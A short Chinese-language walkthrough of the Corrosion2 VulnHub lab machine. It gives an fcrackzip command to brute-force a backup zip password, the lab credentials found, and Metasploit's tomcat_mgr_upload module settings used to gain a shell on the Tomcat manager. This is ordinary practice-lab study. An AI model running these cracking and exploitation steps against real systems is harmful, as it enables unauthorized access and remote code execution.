1.安装靶机

https://download.vulnhub.com/corrosion/Corrosion2.ovahttps://download.vulnhub.com/corrosion/Corrosion2.ova

2.扫描IP

3.扫描端口

4.访问端口

首先访问一下80端口

访问一个8080端口发现是一个apache的页面

5.扫描目录与漏洞探测

那么我们扫描一下目录

80端口没有扫描到东西，这里我们扫描8080

扫描到一个压缩包还有readme.txt，还有一些别的目录，我们访问一下看看有没有有用的信息

说服务器上有个文件还有密码，我们去看一下那个压缩包，发现解压需要密码，我们使用kali的工具爆破一下

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip

@administrator_hi5

然后去解压看一下里面的内容

找到两组登录用户和密码

6.漏洞利用

然后使用msfconsole获取shell

use exploit/multi/http/tomcat_mgr_upload
set RHOST 192.168.248.145
set HttpUsername  manager
set HttpPassword  melehifokivai

然后run

输入shell，就可以执行命令了